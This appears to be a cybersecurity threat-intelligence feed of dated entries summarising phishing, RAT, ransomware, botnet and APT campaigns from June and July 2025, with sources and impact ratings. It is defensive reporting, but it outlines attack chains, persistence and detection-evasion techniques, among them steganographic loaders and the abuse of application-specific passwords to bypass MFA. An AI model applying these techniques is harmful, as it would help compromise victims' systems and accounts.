Researchers from Cyfirma have uncovered a spear-phishing campaign conducted by APT36 also known as Transparent Tribe targeting Indian defense personnel leveraging BOSS Linux systems. The attackers send ZIP archives containing a malicious desktop shortcut file. When clicked, it downloads and displays a legitimate PowerPoint decoy while simultaneously retrieving and launching a GO-based ELF binary in the background. The ELF payload establishes a persistent C2 channel over a non-standard port, enabling data exfiltration and covert screenshot capture. It also gathers system information, enumerates storage drives, and uses obfuscated logging routines to evade detection.
Source: https://www.cyfirma.com/research/phishing-attack-deploying-malware-on-indian-defense-boss-linux/
2025-07-07
Atera_RMM_Phishing_Campaign
MEDIUM
+
Intel Source:
KB4ThreatLabs
Intel Name:
Atera_RMM_Phishing_Campaign
Date of Scan:
2025-07-07
Impact:
MEDIUM
Summary:
Researchers from KnowBe4 ThreatLabs have identified a targeted phishing campaign exploiting Social Security statement updates to distribute a malicious MSI installer masquerading as the Atera Agent RMM. On July 3, 2025, threat actors leveraged compromised email accounts to send a lure offering a “30-day free trial,” thereby deploying the legitimate Atera RMM on Windows hosts. By abusing the platform’s living-off-the-land capabilities, adversaries establish persistent C2 channels that enable file transfers, interactive shell access and AI-assisted command execution via the RMM web console.
Source: https://x.com/Kb4Threatlabs/status/1940759187514183827
2025-07-07
AiLock_Ransomware_Operation
MEDIUM
+
Intel Source:
Medium(S2W Threat Research)
Intel Name:
AiLock_Ransomware_Operation
Date of Scan:
2025-07-07
Impact:
MEDIUM
Summary:
Researchers at S2W Threat Intelligence Center have observed the AiLock ransomware campaign emerge in March 2025, leveraging a dual-threaded ChaCha20 and NTRUEncrypt engine to encrypt files and deploy ransom demands. Initial detection by Zscaler highlighted two early victims, with five organizations publicly listed on the group’s leak site by July 4, 2025, confirming active data exfiltration. The actor exploits native Windows APIs to terminate critical services and empty recycle bins, maximizing encryption coverage, while employing XOR-based string obfuscation and multithreaded I/O Completion Ports for stealth and performance.
Source: https://medium.com/s2wblog/detailed-analysis-of-ailock-ransomware-1d3263beff15?source=rss----30a8766b5c42---4
2025-07-06
Hpingbot_Distributing_Malware_Via_Pastebin
MEDIUM
+
Intel Source:
NSFocus
Intel Name:
Hpingbot_Distributing_Malware_Via_Pastebin
Date of Scan:
2025-07-06
Impact:
MEDIUM
Summary:
NSFOCUS researchers have identified a new botnet known as hpingbot, developed in Go based language and designed to operate across multiple platforms, including Linux, IoT, and Windows systems. This botnet abuses Pastebin to distribute its malicious payloads and leverages hping3 to launch DDoS attacks. It has two primary objectives: first, to deliver additional malware to compromise systems and second, to conduct network attacks that can disrupt online services. It maintains communication with its C2 server by sending small heartbeat signals to Pastebin every ten seconds and downloads additional malicious tools via curl or wget commands. The malware employs multiple techniques such as Systemd, SysVinit, and Cron to maintain persistence.
Source: https://nsfocusglobal.com/hpingbot-a-new-botnet-family-based-on-pastebin-payload-delivery-chain-and-hping3-ddos-module/
2025-07-06
XwormRAT_Distributing_via_Steganography
LOW
+
Intel Source:
ASEC
Intel Name:
XwormRAT_Distributing_via_Steganography
Date of Scan:
2025-07-06
Impact:
LOW
Summary:
Researchers at ASEC have uncovered a phishing campaign distributing XwormRAT malware leveraging steganography. The attackers send phishing emails containing a compressed .RAR archive which includes a VBScript and JavaScript hybrid file that acts as a dropper. When opened, this script runs a PowerShell command that downloads JPEG image which hides malicious code using steganography techniques. The PowerShell script removes dummy characters from the image and decodes Base64 or bitmap-encoded data to extract and execute the final XwormRAT payload. The campaign primarily targets corporate users involved in procurement and supply chains, using fake requests for quotation as lures from a Hong Kong based entity.
Source: https://asec.ahnlab.com/ko/88785/
2025-07-06
Amazon_Prime_Day_Phishing_Campaign
LOW
+
Intel Source:
Checkpoint
Intel Name:
Amazon_Prime_Day_Phishing_Campaign
Date of Scan:
2025-07-06
Impact:
LOW
Summary:
Check Point researchers have uncovered a widespread phishing campaign targeting Amazon customers ahead of Prime Day 2025, scheduled for July 8th. Threat actors have registered numerous fake domains designed to impersonate official Amazon websites to trick users into revealing their login details and payment information. These spoofed websites closely mimic Amazon’s official sign-in pages while the phishing emails disguised as official Amazon communications often using urgent subject lines such as Refund Due – Amazon System Error to lure recipients into clicking malicious links. Upon successful compromise, attackers can gain access to user accounts, conduct unauthorized purchases, identity theft, and abuse of saved gift cards.
Source: https://blog.checkpoint.com/research/amazon-prime-day-2025-deals-await-but-so-do-the-cyber-criminals-2/
2025-07-06
FoxyWallet_Malware_Campaign
LOW
+
Intel Source:
Koi Security
Intel Name:
FoxyWallet_Malware_Campaign
Date of Scan:
2025-07-06
Impact:
LOW
Summary:
Researchers at Koi Security have discovered a malicious campaign called FoxyWallet targeting cryptocurrency users since at least April 2025. The attackers developed over 40 counterfeit Firefox browser extensions that impersonate legitimate cryptocurrency wallets such as MetaMask, Coinbase, Trust Wallet, and Phantom. These fake extensions replicate the names, logos and open-source code of the original wallets while also inflating fake reviews to trick users into downloading them. Once installed, the extensions capture seed phrases and private keys through web portal input interception and silently exfiltrate information to attacker-controlled servers along with users’ external IP addresses.
Source: https://blog.koi.security/foxywallet-40-malicious-firefox-extensions-exposed-4c14419de486
2025-07-05
Exploitation_of_Java_Debug_for_Crypto_Mining
LOW
+
Intel Source:
WIZ
Intel Name:
Exploitation_of_Java_Debug_for_Crypto_Mining
Date of Scan:
2025-07-05
Impact:
LOW
Summary:
Researchers at Wiz discovered that an unknown attacker deployed a cryptomining payload after exposing Java Debug Wire Protocol (JDWP) endpoints on a decoy TeamCity CI/CD server. The attackers scan the internet for systems with the JDWP port (TCP/5005) open, confirms active sessions, and then executes system commands using Java’s built-in tools. They download a malicious script that removes other miners and install a hidden version of the XMRig miner disguised as a logrotate utility. To maintain persistence, the attackers make changes to ensure the miner restarts on login, reboot, or at scheduled times. They also leverage proxies and hardcoded configuration to hide the cryptocurrency wallet address and evade detection.
Source: https://www.wiz.io/blog/exposed-jdwp-exploited-in-the-wild
2025-07-05
Exploitation_of_SHELLTER_Framework_to_Spread_Malware
LOW
+
Intel Source:
Elastic Labs
Intel Name:
Exploitation_of_SHELLTER_Framework_to_Spread_Malware
Date of Scan:
2025-07-05
Impact:
LOW
Summary:
Researchers at Elastic Security have uncovered several financially motivated cyber campaigns leveraging SHELLTER Elite v11.0 to distribute data-stealing malware. This tool, which was released in April 2025, is being abused by attackers for its evasion capabilities. It enables malware to bypass both traditional antivirus and behaviour-based detection mechanisms by employing techniques such as AES-128 CBC encryption, fake code to confuse scanners, API obfuscation, and in-memory bypasses for Windows security features like AMSI. Additionally, attackers utilize stealth techniques including DLL preloading and indirect system calls to avoid detection. Researchers also identified three prominent infostealers being used—LUMMA, ARECHCLIENT2 (also known as Sectop RAT), and RHADAMANTHYS—each distributed through various platforms such as MediaFire, YouTube comments, and even underground forums.
Source: https://www.elastic.co/security-labs/taking-shellter
2025-07-05
MentalPositive_macOS_Stealer_Variant
LOW
+
Intel Source:
K7 Labs
Intel Name:
MentalPositive_macOS_Stealer_Variant
Date of Scan:
2025-07-05
Impact:
LOW
Summary:
K7 Security Labs researchers have observed a new macOS stealer attributed to the actor "mentalpositive," which mirrors core functionalities of the 2023 Atomic macOS Stealer (AMOS) but introduces distinct characteristics suggesting a potential fork or early-stage evolution. The malware targets macOS users and executes using Unix process-hollowing tactics to evade terminal and session management detection, employing system calls to disable terminal processes and maintain stealth.
Source: https://labs.k7computing.com/index.php/mentalpositives-new-macos-stealer-amos-repackaged-or-a-new-cyber-threat/
2025-07-04
Phishing_Campaigns_Exploit_ES_Domains_of_Spain
LOW
+
Intel Source:
Cofense
Intel Name:
Phishing_Campaigns_Exploit_ES_Domains_of_Spain
Date of Scan:
2025-07-04
Impact:
LOW
Summary:
Researchers at Cofense have observed a significant increase in the use of Spain’s top-level domain ending in [.]es to conduct phishing campaigns. The volume of malicious .es websites leveraged for phishing jumped nearly 20 times between late 2024 and early 2025. Threat actors are distributing emails containing .es links, either embedded directly in the message or within attachments to trick people into clicking. These links often redirect to deceptive login pages designed to steal usernames and passwords, especially for Microsoft accounts. These phishing campaigns impersonate major organisations such as Microsoft, Adobe and Google. These phishing sites are hosted on Cloudflare infrastructure and employ CAPTCHA challenges to enhance legitimacy and evade automated detection.
Source: https://cofense.com/blog/spain-tld-s-recent-rise-to-dominance
2025-07-04
Chinese_Actors_Targeting_E_Commerce_Websites
MEDIUM
+
Intel Source:
Silent Push
Intel Name:
Chinese_Actors_Targeting_E_Commerce_Websites
Date of Scan:
2025-07-04
Impact:
MEDIUM
Summary:
Researchers at Silent Push have uncovered a large-scale phishing campaign operated by a Chinese-speaking threat actor targeting online shoppers around the globe via thousands of spoofed e-commerce websites. These deceptive websites impersonate legitimate online retailers such as Apple, PayPal, Wayfair, REI, Michael Kors, and Nordstrom to execute fraudulent payment schemes. The campaign emerged during Mexico’s Hot Sale 2025 event, targeting Spanish-speaking users, but subsequently analysis revealed a widespread operation also targeting at English-speaking consumers across multiple regions. There are many spoofed domains which are embedded with functional Google Pay widgets that allow the attacker to steal legitimate payments through real transactions. The threat actors employ various tactics involve website cloning, abuse of online payment APIs, and site misdirection using deceptive branding and domain obfuscation. Additionally, researchers also believe that thousands of fraudulent sites remain active despite takedown efforts.
Source: https://www.silentpush.com/blog/fake-marketplace/?utm_source=rss&utm_medium=rss&utm_campaign=fake-marketplace
2025-07-04
LNK_Malware_Abuse_for_Stealthy_Payload_Delivery
MEDIUM
+
Intel Source:
unit42
Intel Name:
LNK_Malware_Abuse_for_Stealthy_Payload_Delivery
Date of Scan:
2025-07-04
Impact:
MEDIUM
Summary:
Researchers from Unit 42 have identified extensive and evolving misuse of Windows Shortcut (LNK) files by threat actors to facilitate covert malware execution. Adversaries are abusing the flexibility of LNK files to execute embedded or referenced payloads using trusted system binaries such as powershell.exe, cmd.exe, wscript.exe, and rundll32.exe. The observed techniques fall into four main categories: exploit-based execution, direct file execution, in-argument script execution, and overlay content delivery. The latter is increasingly favored, with attackers appending encoded malicious content to the end of LNK files and executing it through scripts or utilities like findstr or mshta.exe. Obfuscation of command-line arguments, dynamic environment variable usage, and base64-encoded payloads are employed to evade detection and hinder analysis.
Source: https://unit42.paloaltonetworks.com/lnk-malware/
2025-07-04
Ivanti_CSA_Zero_Day_Exploitation_Campaign
HIGH
+
Intel Source:
France’s Cybersecurity Agency - ANSSI
Intel Name:
Ivanti_CSA_Zero_Day_Exploitation_Campaign
Date of Scan:
2025-07-04
Impact:
HIGH
Summary:
According to ANSSI’s analysis, the Houken intrusion set leveraged three zero-day vulnerabilities in Ivanti Cloud Service Appliance (CVE-2024-8190, CVE-2024-8963 and CVE-2024-9380) in September 2024 to gain initial access to French governmental, telecommunications, media, finance and transport networks . Operators executed a base64-encoded Python script to decrypt and harvest administrative credentials, deployed or created PHP webshells, modified legitimate PHP resources to embed backdoors and occasionally installed a sophisticated kernel-space rootkit for persistence. Infrastructure relied on commercial VPN services, Tor exit nodes and diverse VPS configurations, indicating a blend of commodity services and bespoke tooling . ANSSI suspects Houken acts as an initial access broker linked to UNC5174, selling footholds to state-linked entities while also exhibiting profit-driven behaviors such as data exfiltration and cryptomining.
Source: https://www.cert.ssi.gouv.fr/uploads/CERTFR-2025-CTI-009.pdf
2025-07-03
DCRat_Masquerades_as_Colombian_Government
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
DCRat_Masquerades_as_Colombian_Government
Date of Scan:
2025-07-03
Impact:
MEDIUM
Summary:
Researchers at FortiGuard Labs have identified an ongoing malware campaign leveraging DCRat, a modular remote access trojan, to target entities in Colombia through a phishing operation that impersonates a Colombian government agency. The attack chain begins with a ZIP file delivered via email, containing an obfuscated VBS script designed to evade detection and analysis. This script launches obfuscated PowerShell code that retrieves a second-stage image payload encoded with base64 data and steganography, which ultimately delivers the RAT executable.
Source: https://www.fortinet.com/blog/threat-research/dcrat-impersonating-the-columbian-government
2025-07-03
DPRK_NimDoor_Malware_Targeting_macOS
LOW
+
Intel Source:
SentinelLABS
Intel Name:
DPRK_NimDoor_Malware_Targeting_macOS
Date of Scan:
2025-07-03
Impact:
LOW
Summary:
SentinelLABS researchers have uncovered a sophisticated campaign by DPRK threat actors, dubbed NimDoor, targeting Web3 and crypto-related businesses on the macOS platform. The operation, active since at least April 2025, begins with social engineering to trick users into running a malicious AppleScript disguised as a Zoom update. This initiates a multi-stage attack using an eclectic mix of C++, AppleScript, and Nim-compiled binaries. The actors employ advanced and unusual TTPs for macOS, including process injection, encrypted WebSocket (wss) for C2 communications, and a novel persistence mechanism that uses signal handlers (SIGINT/SIGTERM) to install a LaunchAgent upon termination. The ultimate goal is to exfiltrate sensitive data, including Keychain credentials, browser data, and Telegram user information, using custom Bash scripts.
Source: https://www.sentinelone.com/labs/macos-nimdoor-dprk-threat-actors-target-web3-and-crypto-platforms-with-nim-based-malware/
2025-07-02
Snake_Keylogger_Phishing_Targets_Oil_Sector
MEDIUM
+
Intel Source:
OTS Security
Intel Name:
Snake_Keylogger_Phishing_Targets_Oil_Sector
Date of Scan:
2025-07-02
Impact:
MEDIUM
Summary:
OTS Security researchers have observed a new spear-phishing campaign delivers the Russian-origin Snake Keylogger to targets in the global oil and gas industry by impersonating a Kazakh petroleum company. The attack uses a novel DLL sideloading technique, abusing the legitimate Java utility jsadebugd.exe to inject the stealer malware into the InstallUtil.exe process. Once active, the malware establishes persistence via a registry Run key and harvests a wide range of credentials from dozens of browsers and applications for exfiltration over SMTP.
Source: https://mp.weixin.qq.com/s/cQ0cV_lbvGH3q6JI8TtNRQ
2025-07-02
Janela_RAT_with_Chromium_Stealer_Extension
LOW
+
Intel Source:
Medium (Walmart Global Tech Blog)
Intel Name:
Janela_RAT_with_Chromium_Stealer_Extension
Date of Scan:
2025-07-02
Impact:
LOW
Summary:
Walmart Global Tech researchers have observed a multi-stage attack campaign delivering Janela RAT alongside a malicious browser extension, leveraging MSI installers hosted on GitLab. The Janela RAT, a likely variant of BX RAT previously linked to LATAM targeting, is dropped via an installer that embeds a Go-based binary and multiple scripts. These scripts establish execution logic, unzip payloads, and load the browser extension covertly into Chromium-based browsers using native messaging APIs. The extension is equipped to execute commands such as screenshot capture, system reconnaissance, and data collection, including cookies, browsing history, and installed extensions. Command and control (C2) communication is facilitated via WebSockets and encoded configuration retrieved from GitLab-hosted files.
Source: https://medium.com/walmartglobaltech/janela-rat-and-a-stealer-extension-delivered-together-e274469a7df8
2025-07-02
DEVMAN_Ransomware
MEDIUM
+
Intel Source:
ANY.RUN
Intel Name:
DEVMAN_Ransomware
Date of Scan:
2025-07-02
Impact:
MEDIUM
Summary:
Researchers at ANY.RUN have uncovered a new ransomware strain, DEVMAN, operating as a custom variant within the DragonForce Ransomware-as-a-Service (RaaS) ecosystem. The actor primarily targeting victims across Asia and Africa, using a dedicated leak site to pressure victims after data exfiltration and encryption. While reusing a significant amount of DragonForce's Conti-derived codebase, DEVMAN introduces unique traits, such as a flawed builder that encrypts its own ransom notes. Key TTPs include probing for SMB shares to spread laterally and abusing the Windows Restart Manager to bypass file locks and encrypt critical system files like NTUSER.DAT.
Source: https://any.run/cybersecurity-blog/devman-ransomware-analysis/
2025-07-01
CVE_2025_3248_Langflow_Exploit_for_Flodrix_Botnet
MEDIUM
+
Intel Source:
PolySwarm
Intel Name:
CVE_2025_3248_Langflow_Exploit_for_Flodrix_Botnet
Date of Scan:
2025-07-01
Impact:
MEDIUM
Summary:
PolySwarm researchers have identified active exploitation of a critical unauthenticated remote code execution vulnerability — CVE-2025-3248 — in the Langflow AI development framework. Threat actors are leveraging publicly available proof-of-concept exploits to compromise unpatched Langflow instances and deploy the Flodrix botnet, a more advanced variant of the LeetHozer malware family. The attack chain begins with widespread scanning for exposed Langflow deployments, followed by exploitation to deliver a Python-based payload. Once infected, the Flodrix malware enables attackers to conduct DDoS attacks and potentially exfiltrate sensitive data, while employing evasion tactics such as self-deletion and string obfuscation to bypass detection. With a CVSS score of 9.8, this vulnerability presents a severe risk of complete system compromise and service disruption for organizations running outdated or unpatched versions of Langflow.
Source: https://blog.polyswarm.io/threat-actors-exploit-cve-2025-3248-to-deliver-flodrix-botnet
2025-07-01
RansomHub_Exploits_RDP_via_Password_Spray
MEDIUM
+
Intel Source:
The DFIR Report
Intel Name:
RansomHub_Exploits_RDP_via_Password_Spray
Date of Scan:
2025-07-01
Impact:
MEDIUM
Summary:
Researchers at The DFIR Report have observed a RansomHub affiliate campaign actively compromising networks through password spray attacks against exposed Remote Desktop Protocol (RDP) services, achieving complete network compromise and ransomware deployment in under six days. Following initial access, the attacker moves rapidly, using tools like Mimikatz for credential harvesting and network scanners for discovery. Persistence is established using legitimate remote management tools such as Atera and Splashtop to blend in with normal administrative activity.
Source: https://thedfirreport.com/2025/06/30/hide-your-rdp-password-spray-leads-to-ransomhub-deployment/
2025-07-01
UAC_0226_Targets_Government_and_Defence_Entities
MEDIUM
+
Intel Source:
Arctic Wolf Labs
Intel Name:
UAC_0226_Targets_Government_and_Defence_Entities
Date of Scan:
2025-07-01
Impact:
MEDIUM
Summary:
Researchers from Arctic Wolf have identified a malware named GIFTEDCROOK, developed by cyber-espionage group UAC-0226. Initially this malware was a basic browser credential stealer but now it has transformed into a sophisticated data exfiltration platform. The latest version (v1.3) is capable of stealing not only browser data but also a sensitive data based on their file type, size, and recent changes. UAC-0226 distributes this malware through spear-phishing emails containing fake military-themed PDF attachment that impersonate Ukrainian government agencies. These campaigns coincided with critical geopolitical events, including the June 2025 Ukraine-Russia negotiations in Istanbul, which shows that the attackers are targeting Ukrainian government and military information for intelligence purposes. The malware employs encrypted file archives, sends stolen data through Telegram channels and deletes itself to evade detection.
Source: https://arcticwolf.com/resources/blog/giftedcrook-strategic-pivot-from-browser-stealer-to-data-exfiltration-platform/
2025-07-01
Anubis_RaaS_with_Wiper_Capability
MEDIUM
+
Intel Source:
picussecurity
Intel Name:
Anubis_RaaS_with_Wiper_Capability
Date of Scan:
2025-07-01
Impact:
MEDIUM
Summary:
Researchers at Picus Security have detailed the Anubis Ransomware-as-a-Service (RaaS) operation, a significant threat observed since December 2024 that has evolved to combine data encryption with an optional, destructive file-wiping function. Operators gain initial access via spear-phishing before executing the payload, which is highly configurable through command-line parameters. The malware performs stealthy privilege checks, disables security and backup services, and deletes Volume Shadow Copies to maximize impact and prevent recovery.
Source: https://www.picussecurity.com/resource/blog/anubis-ransomware-targets-global-victims-with-wiper-functionality
2025-06-30
Remcos_Malware_Campaign
LOW
+
Intel Source:
ForcePoint
Intel Name:
Remcos_Malware_Campaign
Date of Scan:
2025-06-30
Impact:
LOW
Summary:
Forcepoint researchers have uncovered an ongoing Remcos malware campaign that leverages phishing emails from compromised email accounts belonging to small businesses and educational institutions to maintain long-term access to infected systems. These emails contain malicious LNK files inside TAR archives which trigger a PowerShell script that downloads a hidden malware file disguised as PDF. The malware leverages a special path-parsing techniques (\\?\C:\) to creates fake Windows directories. It uses heavily obfuscated batch scripts and renames system tools to evade detection. The malware establishes persistence via scheduled tasks and weakens UAC protections by modifying registry settings. Once active, the malware injects itself into legitimate Windows processes like SndVol.exe and communicates with C2 server hosted on OVHcloud using an uncommon port to receive instructions and send back stolen data.
Source: https://www.forcepoint.com/blog/x-labs/remcos-malware-new-face
2025-06-30
Blind_Eagle_Phishing_Campaign
MEDIUM
+
Intel Source:
Darktrace
Intel Name:
Blind_Eagle_Phishing_Campaign
Date of Scan:
2025-06-30
Impact:
MEDIUM
Summary:
Researchers at Darktrace have identified that the threat actor known as Blind Eagle (APT-C-36) is actively carrying out a phishing campaign targeting organizations across Latin America, with a particular emphasis on Colombia. The group primarily focuses on the government, financial, and critical infrastructure sectors. Their attack chain typically begins with a phishing email that leads victims to download a malicious payload, often exploiting the WebDAV protocol. Blind Eagle has shown a high degree of adaptability, continuing to employ low-interaction attack techniques even after the relevant Microsoft vulnerability was patched. The group using Remote Access Trojans (RATs) and Dynamic DNS to establish resilient command-and-control (C2) infrastructure, enabling persistent access and extensive data exfiltration.
Source: https://www.darktrace.com/blog/patch-and-persist-darktraces-detection-of-blind-eagle-apt-c-36?&web_view=true
2025-06-28
APT28_Deploys_BEARDSHELL_and_COVENANT_Backdoors
MEDIUM
+
Intel Source:
CERT-UA
Intel Name:
APT28_Deploys_BEARDSHELL_and_COVENANT_Backdoors
Date of Scan:
2025-06-28
Impact:
MEDIUM
Summary:
CERT-UA researchers have observed that the UAC-0001 threat group (APT28) conducted a multi-stage cyber attack against Ukrainian government agencies in March-April 2024. The actors deployed a sophisticated toolset that includes the BEARDSHELL and SLIMAGENT backdoors, as well as the open-source COVENANT C2 framework. Initial access was likely gained through a malicious document delivered via the Signal messenger, which executed a macro to initiate a complex infection chain. This chain using COM hijacking for persistence and leverages legitimate cloud services, such as Koofr and Icedrive, for C2 communications, making the traffic difficult to detect. The final payload, BEARDSHELL, is a C++ backdoor capable of loading and executing PowerShell scripts. The attack's objective appears to be espionage, underscored by the deployment of SLIMAGENT, a tool designed for taking and exfiltrating encrypted screenshots.
Source: https://cert.gov.ua/article/6284080
2025-06-27
SSA_Themed_Phishing_Campaign
LOW
+
Intel Source:
Cyberarmor
Intel Name:
SSA_Themed_Phishing_Campaign
Date of Scan:
2025-06-27
Impact:
LOW
Summary:
Researchers at CyberArmor have discovered a phishing campaign in which cybercriminals tricked over 2,000 people by impersonating official communications from the U.S. Social Security Administration (SSA). The attackers send phishing emails containing links that redirect to a deceptive SSA-themed page hosted on Amazon Web Services. This page instructs victims to click Access The Statement which redirect them to another page with instructions to download and execute a file. The downloaded file is a .NET-based malware loader. Once executed, the malware deploys ScreenConnect for remote access and activates a backdoor named ENTRYPOINT to silently connect to the attacker’s server and gain control over the victim’s system.
Source: https://cyberarmor.tech/hacker-exploit-social-security-statement-theme-to-target-over-2000-victims-with-malware/
2025-06-27
APT38_Infrastructure_Hunt_Uncovers_macOS_Malware
MEDIUM
+
Intel Source:
Darkatlas
Intel Name:
APT38_Infrastructure_Hunt_Uncovers_macOS_Malware
Date of Scan:
2025-06-27
Impact:
MEDIUM
Summary:
Darkatlas researchers have uncovered an active command-and-control infrastructure belonging to the North Korean state-sponsored threat actor APT38 (Bluenoroff). This financially motivated subgroup of the Lazarus Group continues to target the global financial sector, including banks, cryptocurrency exchanges, and SWIFT endpoints. By pivoting on technical fingerprints, such as the JARM hash of a known malicious server's SSL certificate, researchers identified a network of related infrastructure. This network was subsequently linked to the deployment of the Cosmic Rust malware family, a payload specifically designed to target macOS platforms. The findings demonstrate that APT38 remains active, is expanding its operational infrastructure, and is leveraging macOS malware as part of its espionage and theft campaigns.
Source: https://darkatlas.io/blog/bluenoroff-apt38-live-infrastructure-hunting
2025-06-26
Odyssey_Stealer_macOS_Infostealer
LOW
+
Intel Source:
Cyfirma
Intel Name:
Odyssey_Stealer_macOS_Infostealer
Date of Scan:
2025-06-26
Impact:
LOW
Summary:
Researchers at CYFIRMA have identified Odyssey Stealer, a Malware-as-a-Service (MaaS) info-stealer actively targeting macOS users. Attributed to a threat actor known as "Rodrigo," the malware is a rebrand of Poseidon Stealer and targets individuals in Western countries interested in finance and cryptocurrency, with command-and-control infrastructure primarily hosted in Russia. The attack begins with a "Clickfix" social engineering tactic, using typosquatted domains that present a fake Cloudflare CAPTCHA to trick users into running a malicious AppleScript command in their terminal. This script executes the primary payload, which is designed to steal a wide range of sensitive data, including browser credentials, session tokens, personal documents, macOS Keychain data, and, critically, private keys and seed phrases from numerous cryptocurrency wallets.
Source: https://www.cyfirma.com/research/odyssey-stealer-the-rebrand-of-poseidon-stealer/
2025-06-26
WogRAT_Malware_Targets_Window_and_Linux_Systems
LOW
+
Intel Source:
ASEC
Intel Name:
WogRAT_Malware_Targets_Window_and_Linux_Systems
Date of Scan:
2025-06-26
Impact:
LOW
Summary:
ASEC researchers have discovered a coordinated campaign that targets both Windows and Linux web servers, including IIS-based systems. The attackers gain initial access through file upload vulnerabilities to deploy ASP/ASPX web shells, enabling persistent access and command execution. After gaining access, the attackers leverage tools like Ladon, Fscan, MeshAgent, and WogRAT for scanning, privilege escalation, and remote access. The attackers show advanced capabilities by deploying malware that works on both Windows (PE) and Linux (ELF) systems. They also move across the network using Windows tools like WMIExec and steal login details using credential dumping tools such as Network Password Dump.
Source: https://asec.ahnlab.com/ko/88559/
2025-06-25
ASP_Phishing_Targets_Critics_of_Russia
MEDIUM
+
Intel Source:
Google Threat Intelligence
Intel Name:
ASP_Phishing_Targets_Critics_of_Russia
Date of Scan:
2025-06-25
Impact:
MEDIUM
Summary:
Researchers at Google Threat Intelligence Group (GTIG) reports on a sophisticated social engineering campaign by UNC6293, a threat actor assessed with low confidence as being associated with the Russia-linked group APT29. Active since at least April 2025, the campaign targets prominent academics and critics of Russia to gain persistent access to their Gmail accounts. Attackers build rapport with targets before sending lures impersonating entities like the U.S. Department of State, using spoofed email addresses to enhance legitimacy. The objective is to convince the target to create a Google Application Specific Password (ASP) and share the 16-digit code, a method which bypasses standard multi-factor authentication and grants the actor ongoing access to the victim's mailbox.
Source: https://cloud.google.com/blog/topics/threat-intelligence/creative-phishing-academics-critics-of-russia
2025-06-25
Confucius_APT_Deploys_New_Anondoor_Backdoor
MEDIUM
+
Intel Source:
Knowsec 404 Advanced Threat Intelligence Team
Intel Name:
Confucius_APT_Deploys_New_Anondoor_Backdoor
Date of Scan:
2025-06-25
Impact:
MEDIUM
Summary:
The Knowsec 404 Advanced Threat Intelligence Team have identified an evolved malware campaign from the Confucius APT group. This campaign, targeting government and military entities in South and East Asia, deploys a new componentized backdoor named "anondoor." The attack initiates via a LNK file which uses a legitimate Python executable to side-load the malicious anondoor DLL. A key evolution in this campaign is the malware's modularity; anondoor acts as a downloader, receiving instructions and C2 details from the server to fetch and execute subsequent components, such as the "wooperstealer" infostealer. Persistence is established via a scheduled task created by the initial implant.
Source: https://paper.seebug.org/3332/
2025-06-24
Pickai_AI_Backdoor_Supply_Chain_Attack
LOW
+
Intel Source:
Xlab
Intel Name:
Pickai_AI_Backdoor_Supply_Chain_Attack
Date of Scan:
2025-06-24
Impact:
LOW
Summary:
Researchers from XLab have discovered that threat actors are actively exploiting vulnerabilities in the ComfyUI AI framework to deploy a C++ backdoor named Pickai. First observed in February 2025, the campaign's primary objective is the theft of sensitive AI-related data, leveraging command execution and reverse shell capabilities. The malware achieves stealth through process name spoofing and ensures survivability with a highly redundant persistence strategy, creating up to ten distinct service entries on compromised Linux hosts. In a significant escalation, the threat has become a supply chain attack, with malware being distributed from the compromised infrastructure of Rubick.ai, a commercial AI platform serving the e-commerce sector.
Source: https://blog.xlab.qianxin.com/pickai-the_backdoor_hiding_in_your_ai_stack/
2025-06-23
RapperBot_IoT_Botnet_Adds_Extortion
LOW
+
Intel Source:
Xlab Blog (Wang Hao)
Intel Name:
RapperBot_IoT_Botnet_Adds_Extortion
Date of Scan:
2025-06-23
Impact:
LOW
Summary:
Analysis from Qi'anxin's XLAB have revealed the continued evolution of the RapperBot botnet, a large-scale threat that has been active since at least 2021. Primarily used for DDoS-for-hire attacks, the botnet has recently pivoted to include direct extortion, demanding "protection fees" from victims. Comprising over 50,000 bots, the malware targets a wide range of industries globally by exploiting weak Telnet credentials and known vulnerabilities in IoT devices like routers and network cameras. The botnet employs evolving DNS-TXT records for C2 discovery and features multiple custom encryption routines to protect its components.
Source: https://blog.xlab.qianxin.com/rapperbot-en/
2025-06-22
LogMeIn_RAT_Delivered_via_Vercel_Phishing
LOW
+
Intel Source:
CyberArmor
Intel Name:
LogMeIn_RAT_Delivered_via_Vercel_Phishing
Date of Scan:
2025-06-22
Impact:
LOW
Summary:
Researchers at CyberArmor have identified a phishing campaign, active for at least the past two months, where threat actors are abusing the legitimate Vercel hosting platform to deliver a malicious version of the LogMeIn remote access tool. Attackers use phishing emails with lures related to invoices and deliveries to direct victims to Vercel-hosted websites that impersonate an Adobe PDF viewer. Social engineering convinces the user to download and run an executable file, which installs the remote access tool and grants the attacker full control over the compromised machine. This abuse of trusted services like Vercel and LogMeIn is a deliberate tactic to bypass security controls and lower user suspicion, making detection difficult.
Source: https://cyberarmor.tech/threat-insight-cybercriminals-abusing-vercel-to-deliver-remote-access-malware/
2025-06-22
PowerShell_Loaders_Deploy_Cobalt_Strike
MEDIUM
+
Intel Source:
Hunt.IO
Intel Name:
PowerShell_Loaders_Deploy_Cobalt_Strike
Date of Scan:
2025-06-22
Impact:
MEDIUM
Summary:
Researchers at Hunt.io have identified a threat campaign leveraging PowerShell loaders to deliver Cobalt Strike beacons, utilizing infrastructure across China, Russia, and other global cloud platforms. Discovered in late May and early June 2025, the attack begins with a PowerShell script retrieved from an open directory on a Chinese server. This script executes shellcode in-memory, employing API hashing and reflective DLL injection to evade detection. The initial payload connects to a second-stage server on Baidu's cloud platform to retrieve the final Cobalt Strike beacon, which then communicates with a command-and-control server in Russia.
Source: https://hunt.io/blog/cobaltstrike-powershell-loader-chinese-russian-infrastructure
2025-06-21
TxTag_Toll_Phishing_Campaign
LOW
+
Intel Source:
Cofense
Intel Name:
TxTag_Toll_Phishing_Campaign
Date of Scan:
2025-06-21
Impact:
LOW
Summary:
Cofense researchers have discovered phishing campaign impersonating TxTag, a legitimate toll collection service in Texas. The attackers send phishing emails that spoof a legitimate Indiana state government email address, leveraging a legitimate domain to deceive recipients. The email warns recipients about unpaid toll fees and threatens penalties or vehicle registration holds to induce urgency. If recipients click the embedded link, they are redirected to a deceptive website disguised as the official TxTag site, hosted on a fake domain (txtag-help[.]xyz) where victims are asked to enter personal information, credit card details, and additional payment data if the fake payment form claims the initial attempt failed.
Source: https://cofense.com/blog/txtag-takedown-busting-phishing-email-schemes
2025-06-20
CAPTCHA_Campaigns_Deliver_Malware
LOW
+
Intel Source:
Elastic Security Labs
Intel Name:
CAPTCHA_Campaigns_Deliver_Malware
Date of Scan:
2025-06-20
Impact:
LOW
Summary:
